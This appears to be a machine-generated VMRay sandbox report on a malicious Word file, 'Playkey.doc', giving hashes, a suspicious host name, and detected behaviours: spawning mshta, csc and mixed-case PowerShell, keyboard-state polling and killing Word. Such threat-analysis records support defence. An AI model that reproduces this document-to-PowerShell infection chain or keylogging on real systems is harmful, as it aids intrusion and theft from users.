PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB Analyzed Sample #19989 Malware Artifacts 19989 Sample-ID: #19989 Job-ID: #12711 This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #19989 Submission-ID: #20151 C:\Users\aETAdzjz\Desktop\Playkey.doc doc MD5 9587a58c5d456ca4fb8d8abba0945861 SHA1 18bb1da68d2073efb52ce3792311b15e958d85a5 SHA256 7a641c8fa1b7a428bfb66d235064407ab56d119411fbaca6268c8e69696e6729 Opened_By Metadata of Analysis for Job-ID #12711 Timeout True x86 64-bit win7_64_sp1-mso2016 True Windows 7 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) 158.12 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "www.samyrai777m.p-host.in". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\mshta.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Local\!PrivacIE!SharedMemory!Mutex". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe". Create process Device VTI rule match with VTI rule score 3/5 vmray_hook_key_by_keystate_api Frequently read the state of a keyboard key by API. Monitor keyboard input Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\system32\taskkill.exe" /f /im winword.exe". Create process